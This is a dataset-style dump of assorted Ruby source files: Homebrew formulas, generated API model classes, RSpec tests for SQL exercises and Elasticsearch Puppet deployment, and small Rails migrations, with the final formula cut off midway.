hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
1a90b9f187c134a20a2382d06653f66f1a4e4c92 | 811 | class BoostBuild < Formula
desc "C++ build system"
homepage "https://www.boost.org/build/"
url "https://github.com/boostorg/build/archive/2014.10.tar.gz"
sha256 "d143297d61e7c628fc40c6117d0df41cb40b33845376c331d7574f9a79b72b9f"
head "https://github.com/boostorg/build.git"
bottle do
cellar :any_skip_relocation
sha256 "54e173a7e91aef66bfdb5c497156915518d69dd9a062552ab48e62d443adaa04" => :el_capitan
sha256 "a61eaa58a94a1f236d1dc6e652f7cb57e241e0dd5664bb5cadc258b73ce34887" => :yosemite
sha256 "dd11acd551a6c26f216743eeb938d704f92bc5349c79b5f8e853176e311b7990" => :mavericks
sha256 "03d989cecd3251825466d725f6a00212979b2d41fce344380606b482eaab9b80" => :mountain_lion
end
def install
system "./bootstrap.sh"
system "./b2", "--prefix=#{prefix}", "install"
end
end
| 36.863636 | 95 | 0.782984 |
39ad4562cb858a15993cb512085884c1a4c6b286 | 2,005 | # This file was automatically generated for SMASH by SMASH v2.0
# ( https://smashlabs.io ).
module Smash
# UserCustomUpdateModel Model.
class UserCustomUpdateModel < BaseModel
# TODO: Write general description for this method
# @return [String]
attr_accessor :uid
# TODO: Write general description for this method
# @return [String]
attr_accessor :apiuid
# TODO: Write general description for this method
# @return [String]
attr_accessor :avatar
# TODO: Write general description for this method
# @return [String]
attr_accessor :custom_input
# A mapping from model property names to API property names.
def self.names
if @_hash.nil?
@_hash = {}
@_hash['uid'] = 'uid'
@_hash['apiuid'] = 'apiuid'
@_hash['avatar'] = 'avatar'
@_hash['custom_input'] = 'custom-input'
end
@_hash
end
def initialize(uid = nil,
apiuid = nil,
avatar = nil,
custom_input = nil,
additional_properties = {})
@uid = uid
@apiuid = apiuid
@avatar = avatar
@custom_input = custom_input
# Add additional model properties to the instance.
additional_properties.each do |_name, value|
instance_variable_set("@#{_name}", value)
end
end
# Creates an instance of the object from a hash.
def self.from_hash(hash)
return nil unless hash
# Extract variables from the hash.
uid = hash['uid']
apiuid = hash['apiuid']
avatar = hash['avatar']
custom_input = hash['custom-input']
# Clean out expected properties from Hash.
names.each_value { |k| hash.delete(k) }
# Create object from extracted values.
UserCustomUpdateModel.new(uid,
apiuid,
avatar,
custom_input,
hash)
end
end
end
| 27.465753 | 64 | 0.57606 |
ed5ca2ae2ec3a25b420fedf242975a14c6ba9c96 | 578 | # frozen_string_literal: true
require 'test_helper'
module Archimate
module Svg
module Entity
class ApplicationComponentTest < Minitest::Test
def setup
@model = build_model(
diagrams: [
build_diagram
]
)
@child = @model.diagrams.first.nodes.first
@subject = ApplicationComponent.new(@child, build_bounds)
end
def test_badge
assert_equal "#archimate-app-component-badge", @subject.instance_variable_get(:@badge)
end
end
end
end
end
| 22.230769 | 96 | 0.600346 |
bb231c3b77bb6ca006542380a19dfde014cb2ee4 | 106 | module ModelCoder
class Constants
ID_FIELD = :token
EXTERNAL_NAMESPACE = 'ModelCoder'
end
end
| 15.142857 | 37 | 0.726415 |
87be69f1eb03dc74d08b3dd0e004e1ae4668511e | 1,763 | require 'spec_helper'
include WebMock::API
include Tootsie::API
describe V1 do
include Rack::Test::Methods
def app
V1
end
before :each do
Tootsie::Configuration.instance.update(
aws_access_key_id: "KEY",
aws_secret_access_key: "SECRET",
paths: {
dustin_hoffman: {}
})
end
["/jobs", "/job"].each do |path|
describe "POST #{path}" do
it 'posts job on queue' do
attributes = {
type: 'image',
notification_url: "http://example.com/transcoder_notification",
reference: {'meaning' => 42},
params: {}
}
expect(Configuration.instance.river).to receive(:publish) do |event|
expect(event[:uid]).to match /^tootsie\.job:dustin_hoffman\$/
expect(event[:type]).to eq 'image'
expect(event[:event]).to eq 'tootsie.job'
expect(event[:reference]).to eq({'meaning' => 42})
expect(event[:params]).to eq({})
expect(event[:notification_url]).to eq "http://example.com/transcoder_notification"
end
post '/jobs', JSON.dump(attributes.merge(
path: 'dustin_hoffman'
))
expect(last_response.status).to eq 201
end
it 'accepts job without a path, defaults to "tootsie"' do
attributes = {
type: 'image',
notification_url: "http://example.com/transcoder_notification",
reference: {'meaning' => 42},
params: {}
}
expect(Configuration.instance.river).to receive(:publish) do |event|
expect(event[:uid]).to match /^tootsie\.job:default\$/
end
post '/jobs', JSON.dump(attributes)
expect(last_response.status).to eq 201
end
end
end
end
| 26.313433 | 93 | 0.584231 |
bf2fed9307c92546a2654fbb278b75b19b59a313 | 658 | module Puffer
module OrmAdapter
module Base
def columns_hash
raise ::OrmAdapter::NotSupportedError
end
def reflection name
raise ::OrmAdapter::NotSupportedError
end
def filter scope, fields, options = {}
raise ::OrmAdapter::NotSupportedError
end
def merge_scopes scope, additional
raise ::OrmAdapter::NotSupportedError
end
end
class Reflection < ActiveSupport::OrderedOptions
def initialize hash
super
hash.each { |(key, value)| self[key] = value }
end
end
end
end
OrmAdapter::Base.send :include, Puffer::OrmAdapter::Base | 19.352941 | 56 | 0.636778 |
d591d139dc43ebc0aa5ffd28e89220751397641f | 221 | # typed: true
class AddEpicGamesStoreIdToGames < ActiveRecord::Migration[6.0]
def change
add_column :games, :epic_games_store_id, :text, null: true
add_index :games, :epic_games_store_id, unique: true
end
end
| 27.625 | 63 | 0.755656 |
e875acb046a340beda5ab7e581dfdc4811b64eec | 195 | require "bundler/setup"
Bundler.require(:default)
require "museums/cli"
require "museums/attraction"
require "museums/scraper"
require 'open-uri'
require 'nokogiri'
require "museums/cli/version"
| 21.666667 | 29 | 0.794872 |
03df9441f8abfdcb65355cee640d9118d1022078 | 5,839 | =begin
#Hydrogen Nucleus API
#The Hydrogen Nucleus API
OpenAPI spec version: 1.9.5
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.4.19
=end
require 'date'
module NucleusApi
class StatisticResourceVO
attr_accessor :description
attr_accessor :parameter
attr_accessor :stat_name
attr_accessor :type
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'description' => :'description',
:'parameter' => :'parameter',
:'stat_name' => :'stat_name',
:'type' => :'type'
}
end
# Attribute type mapping.
def self.swagger_types
{
:'description' => :'String',
:'parameter' => :'String',
:'stat_name' => :'String',
:'type' => :'String'
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
if attributes.has_key?(:'description')
self.description = attributes[:'description']
end
if attributes.has_key?(:'parameter')
self.parameter = attributes[:'parameter']
end
if attributes.has_key?(:'stat_name')
self.stat_name = attributes[:'stat_name']
end
if attributes.has_key?(:'type')
self.type = attributes[:'type']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
description == o.description &&
parameter == o.parameter &&
stat_name == o.stat_name &&
type == o.type
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[description, parameter, stat_name, type].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
self.class.swagger_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
(value)
when :Date
(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BOOLEAN
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
temp_model = NucleusApi.const_get(type).new
temp_model.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 27.804762 | 107 | 0.609522 |
6a30d410a5a9ea2ac9c85835a24fa9a75b3ef777 | 2,642 | require 'rspec'
require 'rails_helper'
require_relative '../query_lib/06_joins_warmup.rb'
describe "JOIN warmup" do
describe "films_from_sixty_two" do
it "selects films from the year 1962" do
expect(films_from_sixty_two.conform).to contain_exactly(
["121", "To Kill a Mockingbird"],
["479", "Dr. No"],
["1082", "Music Man, The"],
["1496", "What Ever Happened to Baby Jane?"],
["1751", "Cape Fear"]
)
end
end
describe "year_of_kane" do
it "selects the year that Citizen Kane was released" do
expect(year_of_kane.conform).to contain_exactly(["1941"])
end
end
describe "trek_films" do
it "selects all Star Trek films and orders them by year" do
expect(trek_films.conform).to eq([
["402", "Star Trek: The Motion Picture", "1979"],
["209", "Star Trek: The Wrath of Khan", "1982"],
["438", "Star Trek III: The Search for Spock", "1984"],
["349", "Star Trek IV: The Voyage Home", "1986"],
["472", "Star Trek V: The Final Frontier", "1989"],
["410", "Star Trek VI: The Undiscovered Country", "1991"],
["280", "Star Trek: Generations", "1994"],
["68", "Star Trek: First Contact", "1996"],
["252", "Star Trek: Insurrection", "1998"]
])
end
end
describe "films_by_id" do
it "selects the names of the films with the given IDs" do
expect(films_by_id.conform).to contain_exactly(
["Big Momma's House"],
["Power of One, The"],
["To Be or Not to Be"]
)
end
end
describe "glenn_close_id" do
it "selects the ID of actress Glenn Close" do
expect(glenn_close_id.conform).to contain_exactly(["104"])
end
end
describe "casablanca_id" do
it "selects the ID of the film Casablanca" do
expect(casablanca_id.conform).to contain_exactly(["27"])
end
end
describe "casablanca_cast" do
it "selects the cast of the film Casablanca" do
expect(casablanca_cast.conform).to contain_exactly(
["Humphrey Bogart"],
["Ingrid Bergman"],
["Claude Rains"],
["Peter Lorre"],
["Paul Henreid"],
["John Qualen"],
["Curt Bois"],
["Conrad Veidt"],
["Madeleine LeBeau"]
)
end
end
describe "alien_cast" do
it "selects the cast of the film Alien" do
expect(alien_cast.conform).to contain_exactly(
["Sigourney Weaver"],
["Ian Holm"],
["Harry Dean Stanton"],
["Tom Skerritt"],
["John Hurt"],
["Veronica Cartwright"],
["Yaphet Kotto"]
)
end
end
end
| 28.408602 | 66 | 0.591597 |
6aea552e75328c8ef230df38dfe66ef4c5c16ce7 | 117 | class AddDetailToGenres < ActiveRecord::Migration[5.2]
def change
add_column :genres, :name, :string
end
end
| 19.5 | 54 | 0.735043 |
339263b1ffb4495ca24f9b9b6c308882e9dc1185 | 781 | require_relative 'test_model'
require_relative 'test_enum'
class TestClassWithAttributes
include Riveter::Attributes
attr_string :string, :default => 'A'
attr_text :text, :default => 'b'
attr_integer :integer, :default => 1
attr_decimal :decimal, :default => 9.998
attr_date :date, :default => Date.new(2010, 1, 12)
attr_date_range :date_range, :default => Date.new(2010, 1, 12)..Date.new(2011, 1, 12)
attr_time :time, :default => Time.new(2010, 1, 12, 14, 56)
attr_boolean :boolean, :default => true
attr_enum :enum, TestEnum, :default => TestEnum::Member1
attr_array :array, :default => [1, 2, 3]
attr_hash :hash, :default => {:a => :b}
attr_object :object, :default => 'whatever'
attr_object :with_lambda_default, :default => lambda { self }
end
| 33.956522 | 87 | 0.691421 |
6a06485e09935ca5787df601c0e899b2e6a7c3f4 | 1,138 | begin
require 'rcov/rcovtask'
namespace :test do
targets = ['unit', 'functional', 'integration']
namespace :rcov do
desc "Delete aggregate rcov data."
task :clean do
rm_rf "reports/rcov"
mkdir_p "reports/rcov"
end
desc "Open code rcov reports in a browser."
task :show => 'test:rcov' do
targets.each do |t|
system("open reports/rcov/#{t}/index.html")
end
end
targets.each do |target|
desc "Run the #{target} tests using rcov"
Rcov::RcovTask.new(target) do |t|
t.libs << "test"
t.test_files = FileList["test/#{target}/*_test.rb"]
t.verbose = true
t.output_dir = "reports/rcov/#{target}"
t.rcov_opts << '--rails'
t.rcov_opts << '--exclude gems,__sandbox'
t.rcov_opts << '--html'
end
end
end
task :rcov => (['rcov:clean'] + targets.collect{|t| "rcov:#{t}"})
end
desc "run all tests using rcov"
task :rcov => 'test:rcov'
rescue LoadError
puts "Warning: unable to load rcov tasks"
end
| 25.863636 | 69 | 0.543937 |
2629938c989e7f6921e0adb88f9c52ad3e564785 | 281 | ENV['RAILS_ENV'] ||= 'test'
require_relative '../config/environment'
require 'rails/test_help'
class ActiveSupport::TestCase
# Setup all fixtures in test/fixtures/*.yml for all tests in abc order.
fixtures :all
# Add more helper methods to be used by all tests here...
end
| 25.545455 | 73 | 0.733096 |
79b21bac527e4868a52299fa2514904e3023d08b | 2,024 | require "logger"
require "savon/soap"
module Savon
module Global
# Sets whether to log HTTP requests.
attr_writer :log
# Returns whether to log HTTP requests. Defaults to +true+.
def log?
@log != false
end
# Sets the logger to use.
attr_writer :logger
# Returns the logger. Defaults to an instance of +Logger+ writing to STDOUT.
def logger
@logger ||= ::Logger.new STDOUT
end
# Sets the log level.
attr_writer :log_level
# Returns the log level. Defaults to :debug.
def log_level
@log_level ||= :debug
end
# Logs a given +message+.
def log(message)
logger.send log_level, message if log?
end
# Sets whether to raise HTTP errors and SOAP faults.
attr_writer :raise_errors
# Returns whether to raise errors. Defaults to +true+.
def raise_errors?
@raise_errors != false
end
# Sets the global SOAP version.
def soap_version=(version)
raise ArgumentError, "Invalid SOAP version: #{version}" unless SOAP::Versions.include? version
@version = version
end
# Returns SOAP version. Defaults to +DefaultVersion+.
def soap_version
@version ||= SOAP::DefaultVersion
end
# Returns whether to strip namespaces in a SOAP response Hash.
# Defaults to +true+.
def strip_namespaces?
@strip_namespaces != false
end
# Sets whether to strip namespaces in a SOAP response Hash.
attr_writer :strip_namespaces
# Returns the response pattern to apply.
def response_pattern
@response_pattern ||= []
end
# Sets the response pattern (an Array of Regexps or Symbols).
attr_writer :response_pattern
# Reset to default configuration.
def reset_config!
self.log = true
self.logger = ::Logger.new STDOUT
self.log_level = :debug
self.raise_errors = true
self.soap_version = SOAP::DefaultVersion
self.strip_namespaces = true
self.response_pattern = []
end
end
end
| 23.811765 | 100 | 0.659585 |
e9b97c0b7c0786717e0bd8e1820af9d37b6500e9 | 5,927 | class Global < Formula
include Language::Python::Shebang
desc "GNU Global source code tag system, installed with Universal Ctags"
homepage "https://www.gnu.org/software/global/"
url "https://ftp.gnu.org/gnu/global/global-6.6.7.tar.gz"
mirror "https://ftpmirror.gnu.org/global/global-6.6.7.tar.gz"
sha256 "69a0f77f53827c5568176c1d382166df361e74263a047f0b3058aa2f2ad58a3c"
license "GPL-3.0-or-later"
revision 1
bottle do
sha256 arm64_big_sur: "f2481ae1cb5d8077d7ac769ca1cda9c34a6cb8d0e89eeb831a452f3992dab6e0"
sha256 big_sur: "7d48a07430d1c4197c031dbbeb2c9993e3470f67ef1b2148e76f433039cebd4d"
sha256 catalina: "3814876d5cb67f8e914415fd2ff09b7ebf62ce272af19e9e4c03baebfbb3aa02"
sha256 mojave: "cf6c674b4656adca75cfd7d34af6aa48c9c7f9ce9498137babe2f69a71bb429d"
sha256 x86_64_linux: "0c8e848c0df6aff47f4db8d28784ea2384c1d60c304287e142895807aa9f6736"
end
head do
url ":pserver:anonymous:@cvs.savannah.gnu.org:/sources/global", using: :cvs
depends_on "autoconf" => :build
depends_on "automake" => :build
depends_on "bison" => :build
depends_on "flex" => :build
## gperf is provided by OSX Command Line Tools.
depends_on "libtool" => :build
end
depends_on "autoconf" => :build
depends_on "automake" => :build
depends_on "universal-ctags"
depends_on "libtool"
depends_on "ncurses"
depends_on "[email protected]"
depends_on "sqlite"
skip_clean "lib/gtags"
resource "Pygments" do
url "https://files.pythonhosted.org/packages/ba/6e/7a7c13c21d8a4a7f82ccbfe257a045890d4dbf18c023f985f565f97393e3/Pygments-2.9.0.tar.gz"
sha256 "a18f47b506a429f6f4b9df81bb02beab9ca21d0a5fee38ed15aef65f0545519f"
end
# use homebrew sqlite instead of the older copy included in libdb/
# When removing the patch, check whether we can remove the
# autoconf/automake/libtool dependencies
patch do
url "https://raw.githubusercontent.com/Homebrew/formula-patches/bc4dc49c2476c2d4ffecb21bb76699e67cb57415/global/6.6.7-external-sqlite.patch"
sha256 "1b87c9b90a6555cd77c72de933303348e1e148b71a5976d4a0040a3038ef2627"
end
def install
if build.head?
system "sh", "reconf.sh"
else
# Needed for the patch. Check that this can be removed when the patch is not necessary
system "autoreconf", "--force", "--install", "--symlink", "--verbose"
end
ENV.prepend_create_path "PYTHONPATH", libexec/Language::Python.site_packages("python3")
resource("Pygments").stage do
system "python3", *Language::Python.setup_install_args(libexec)
end
args = %W[
--disable-dependency-tracking
--prefix=#{prefix}
--sysconfdir=#{etc}
--with-sqlite3=#{Formula["sqlite"].opt_prefix}
--with-universal-ctags=ctags
]
system "./configure", *args
system "make", "install"
rewrite_shebang detected_python_shebang, share/"gtags/script/pygments_parser.py"
bin.env_script_all_files(libexec/"bin", PYTHONPATH: ENV["PYTHONPATH"])
etc.install "gtags.conf"
# we copy these in already
cd share/"gtags" do
rm %w[README COPYING LICENSE INSTALL ChangeLog AUTHORS]
end
end
test do
(testpath/"test.c").write <<~EOS
int c2func (void) { return 0; }
void cfunc (void) {int cvar = c2func(); }")
EOS
(testpath/"test.py").write <<~EOS
def py2func ():
return 0
def pyfunc ():
pyvar = py2func()
EOS
system bin/"gtags", "--gtagsconf=#{share}/gtags/gtags.conf", "--gtagslabel=pygments"
assert_match "test.c", shell_output("#{bin}/global -d cfunc")
assert_match "test.c", shell_output("#{bin}/global -d c2func")
assert_match "test.c", shell_output("#{bin}/global -r c2func")
assert_match "test.py", shell_output("#{bin}/global -d pyfunc")
assert_match "test.py", shell_output("#{bin}/global -d py2func")
assert_match "test.py", shell_output("#{bin}/global -r py2func")
assert_match "test.c", shell_output("#{bin}/global -s cvar")
assert_match "test.py", shell_output("#{bin}/global -s pyvar")
system bin/"gtags", "--gtagsconf=#{share}/gtags/gtags.conf", "--gtagslabel=universal-ctags"
# ctags only yields definitions
assert_match "test.c", shell_output("#{bin}/global -d cfunc # passes")
assert_match "test.c", shell_output("#{bin}/global -d c2func # passes")
assert_match "test.py", shell_output("#{bin}/global -d pyfunc # passes")
assert_match "test.py", shell_output("#{bin}/global -d py2func # passes")
refute_match "test.c", shell_output("#{bin}/global -r c2func # correctly fails")
refute_match "test.c", shell_output("#{bin}/global -s cvar # correctly fails")
refute_match "test.py", shell_output("#{bin}/global -r py2func # correctly fails")
refute_match "test.py", shell_output("#{bin}/global -s pyvar # correctly fails")
# Test the default parser
system bin/"gtags", "--gtagsconf=#{share}/gtags/gtags.conf", "--gtagslabel=default"
assert_match "test.c", shell_output("#{bin}/global -d cfunc")
assert_match "test.c", shell_output("#{bin}/global -d c2func")
assert_match "test.c", shell_output("#{bin}/global -r c2func")
assert_match "test.c", shell_output("#{bin}/global -s cvar")
# Test tag files in sqlite format
system bin/"gtags", "--gtagsconf=#{share}/gtags/gtags.conf", "--gtagslabel=pygments", "--sqlite3"
assert_match "test.c", shell_output("#{bin}/global -d cfunc")
assert_match "test.c", shell_output("#{bin}/global -d c2func")
assert_match "test.c", shell_output("#{bin}/global -r c2func")
assert_match "test.py", shell_output("#{bin}/global -d pyfunc")
assert_match "test.py", shell_output("#{bin}/global -d py2func")
assert_match "test.py", shell_output("#{bin}/global -r py2func")
assert_match "test.c", shell_output("#{bin}/global -s cvar")
assert_match "test.py", shell_output("#{bin}/global -s pyvar")
end
end
| 41.447552 | 144 | 0.697824 |
ede77fbbae670ef6c8198f205cd1e2811c82ca61 | 851 | cask "visual-paradigm-ce" do
version "16.3,20211114"
sha256 "3c3757e52e0ffdb04ce31687e3fd6d45b16085bf75dab81d61a6590c7e875293"
url "https://www.visual-paradigm.com/downloads/vpce/Visual_Paradigm_CE_#{version.before_comma.dots_to_underscores}_#{version.after_comma}_OSX_WithJRE.dmg"
name "Visual Paradigm Community Edition"
desc "All-in-one UML, SysML, BPMN Modeling Platform for Agile"
homepage "https://www.visual-paradigm.com/"
livecheck do
url "https://www.visual-paradigm.com/downloads/vpce/checksum.html"
strategy :header_match do |headers|
match = headers["location"].match(%r{/vpce(\d+(?:\.\d+)+)/(\d+)/checksum\.html}i)
next if match.blank?
"#{match[1]},#{match[2]}"
end
end
# Renamed to avoid conflict with visual-paradigm.
app "Visual Paradigm.app", target: "Visual Paradigm CE.app"
end
| 37 | 156 | 0.726204 |
188c77adfe6cee76899d6b077e9c25aaea4d862e | 304 | require_relative 'shared/a_predicate_ast_node'
module Alf
class Predicate
describe Factory, 'not' do
include Factory
subject{ self.not(true) }
it_should_behave_like "a predicate AST node"
it{ should be_a(Not) }
it{ should eql([:not, tautology]) }
end
end
end
| 19 | 50 | 0.664474 |
bb46bfe65c7c06f8569afc957d527579452c4207 | 6,769 | # frozen_string_literal: true
require 'securerandom'
require 'rspec/retry'
require 'simp/beaker_helpers'
include Simp::BeakerHelpers # rubocop:disable Style/MixinUsage
require_relative '../../spec_helper_tls'
require_relative '../../spec_utilities'
require_relative '../../../lib/puppet_x/elastic/deep_to_i'
require_relative '../../../lib/puppet_x/elastic/deep_to_s'
# def f
# RSpec.configuration.fact
# end
# FIXME: This value should better not be hardcoded
ENV['ELASTICSEARCH_VERSION'] = '7.10.1'
ENV.delete('BEAKER_debug')
run_puppet_install_helper('agent') unless ENV['BEAKER_provision'] == 'no'
RSpec.configure do |c|
# General-purpose spec-global variables
c.add_setting :v, default: {}
# Puppet debug logging
v[:puppet_debug] = ENV['BEAKER_debug'] ? true : false
unless ENV['snapshot_version'].nil?
v[:snapshot_version] = ENV['snapshot_version']
v[:is_snapshot] = ENV['SNAPSHOT_TEST'] == 'true'
end
unless ENV['ELASTICSEARCH_VERSION'].nil? && v[:snapshot_version].nil?
v[:elasticsearch_full_version] = ENV['ELASTICSEARCH_VERSION'] || v[:snapshot_version]
v[:elasticsearch_major_version] = v[:elasticsearch_full_version].split('.').first.to_i
v[:elasticsearch_package] = {}
v[:template] = if v[:elasticsearch_major_version] == 6
JSON.parse(File.read('spec/fixtures/templates/6.x.json'))
elsif v[:elasticsearch_major_version] >= 8
JSON.parse(File.read('spec/fixtures/templates/post_8.0.json'))
else
JSON.parse(File.read('spec/fixtures/templates/7.x.json'))
end
v[:template] = Puppet_X::Elastic.deep_to_i(Puppet_X::Elastic.deep_to_s(v[:template]))
v[:pipeline] = JSON.parse(File.read('spec/fixtures/pipelines/example.json'))
end
v[:elasticsearch_plugins] = Dir[
artifact("*#{v[:elasticsearch_full_version]}.zip", ['plugins'])
].map do |plugin|
plugin_filename = File.basename(plugin)
plugin_name = plugin_filename.match(%r{^(?<name>.+)-#{v[:elasticsearch_full_version]}.zip})[:name]
[
plugin_name,
{
path: plugin,
url: derive_plugin_urls_for(v[:elasticsearch_full_version], [plugin_name]).keys.first,
},
]
end.to_h
v[:oss] = !ENV['OSS_PACKAGE'].nil? and ENV['OSS_PACKAGE'] == 'true'
v[:cluster_name] = SecureRandom.hex(10)
# rspec-retry
c.display_try_failure_messages = true
c.default_sleep_interval = 10
# General-case retry keyword for unstable tests
c.around :each, :with_retries do |example|
example.run_with_retry retry: 10
end
# Helper hook for module cleanup
c.after :context, :with_cleanup do
apply_manifest <<-MANIFEST
class { 'elasticsearch':
ensure => 'absent',
manage_repo => true,
oss => #{v[:oss]},
}
file { '/usr/share/elasticsearch/plugin':
ensure => 'absent',
force => true,
recurse => true,
require => Class['elasticsearch'],
}
MANIFEST
end
c.before :context, :with_certificates do
@keystore_password = SecureRandom.hex
@role = [*('a'..'z')].sample(8).join
# Setup TLS cert placement
@tls = gen_certs(2, '/tmp')
create_remote_file hosts, @tls[:ca][:cert][:path], @tls[:ca][:cert][:pem]
@tls[:clients].each do |node|
node.each do |_type, params|
create_remote_file hosts, params[:path], params[:pem]
end
end
end
c.before :context, :with_license do
Vault.address = ENV['VAULT_ADDR']
if ENV['CI']
Vault.auth.approle(ENV['VAULT_APPROLE_ROLE_ID'], ENV['VAULT_APPROLE_SECRET_ID'])
else
Vault.auth.token(ENV['VAULT_TOKEN'])
end
licenses = Vault.with_retries(Vault::HTTPConnectionError) do
Vault.logical.read(ENV['VAULT_PATH'])
end.data
raise 'No license found!' unless licenses
# license = case v[:elasticsearch_major_version]
# when 6
# licenses[:v5]
# else
# licenses[:v7]
# end
license = licenses[:v7]
create_remote_file hosts, '/tmp/license.json', license
v[:elasticsearch_license_path] = '/tmp/license.json'
end
c.after :context, :then_purge do
shell 'rm -rf {/usr/share,/etc,/var/lib}/elasticsearch*'
end
c.before :context, :first_purge do
shell 'rm -rf {/usr/share,/etc,/var/lib}/elasticsearch*'
end
# Provide a hook filter to spit out some ES logs if the example fails.
c.after(:example, :logs_on_failure) do |example|
if example.exception
hosts.each do |host|
on host, "find / -name '#{v[:cluster_name]}.log' | xargs cat || true" do |result|
puts result.formatted_output
end
end
end
end
end
files_dir = ENV['files_dir'] || './spec/fixtures/artifacts'
# General bootstrapping steps for each host
hosts.each do |host|
# # Set the host to 'aio' in order to adopt the puppet-agent style of
# # installation, and configure paths/etc.
# host[:type] = 'aio'
# configure_defaults_on host, 'aio'
if fact('os.family') == 'Suse'
install_package host,
'--force-resolution augeas-devel libxml2-devel ruby-devel'
on host, 'gem install ruby-augeas --no-ri --no-rdoc'
end
v[:ext] = case fact('os.family')
when 'Debian'
'deb'
else
'rpm'
end
v[:elasticsearch_package]&.merge!(
derive_full_package_url(
v[:elasticsearch_full_version], [v[:ext]]
).flat_map do |url, filename|
[[:url, url], [:filename, filename], [:path, artifact(filename)]]
end.to_h
)
end
RSpec.configure do |c|
if v[:is_snapshot]
c.before :suite do
scp_to default,
"#{files_dir}/elasticsearch-snapshot.#{v[:ext]}",
"/tmp/elasticsearch-snapshot.#{v[:ext]}"
v[:snapshot_package] = "file:/tmp/elasticsearch-snapshot.#{v[:ext]}"
end
end
c.before :suite do
fetch_archives(derive_artifact_urls_for(ENV['ELASTICSEARCH_VERSION']))
# Use the Java class once before the suite of tests
unless shell('command -v java', accept_all_exit_codes: true).exit_code.zero?
java = case fact('os.name')
when 'OpenSuSE'
'package => "java-1_8_0-openjdk-headless",'
else
''
end
apply_manifest <<-MANIFEST
class { "java" :
distribution => "jdk",
#{java}
}
MANIFEST
end
end
end
# # Java 8 is only easy to manage on recent distros
# def v5x_capable?
# (fact('os.family') == 'RedHat' and \
# not (fact('os.name') == 'OracleLinux' and \
# f['os']['release']['major'] == '6')) or \
# f.dig 'os', 'distro', 'codename' == 'xenial'
# end
| 30.628959 | 102 | 0.62476 |
917642972541b3ad3c95abb23491b23d8d139d5a | 796 | # frozen_string_literal: true
require 'rugged'
require 'tmpdir'
require 'logger'
require 'yaml'
require 'time'
lib_dir = __dir__
$LOAD_PATH << lib_dir
require 'miq_flow/pluggable/provider_docker'
require 'miq_flow/pluggable/provider_local'
require 'miq_flow/pluggable/provider_noop'
require 'miq_flow/pluggable/method_partial'
require 'miq_flow/pluggable/method_clean'
require 'miq_flow/error'
require 'miq_flow/mixin_miq'
require 'miq_flow/mixin_git'
require 'miq_flow/mixin_api'
require 'miq_flow/mixin_settings'
require 'miq_flow/mixin_config'
require 'miq_flow/manageiq'
require 'miq_flow/domain'
require 'miq_flow/feature'
require 'miq_flow/miqflow'
require 'miq_flow/cli'
require 'miq_flow/version'
$settings = {}
$settings[:miq] = {}
$settings[:git] = {}
MiqFlow::Config.set_defaults()
| 24.121212 | 44 | 0.797739 |
ac89a25fefc9061a0a85c2d61ab5954d290545bd | 1,416 | class Compose2kube < Formula
desc "Convert docker-compose service files to Kubernetes objects"
homepage "https://github.com/kelseyhightower/compose2kube"
url "https://github.com/kelseyhightower/compose2kube/archive/0.0.2.tar.gz"
sha256 "d09b86994949f883c5aa4d041a12f6c5a8989f3755a2fb49a2abac2ad5380c30"
revision 1
head "https://github.com/kelseyhightower/compose2kube.git"
bottle do
cellar :any_skip_relocation
sha256 "ebc7d22f93d1b4032f3d4975b23734e0e2bc1539c91e3f2100778c406f5cdddf" => :mojave
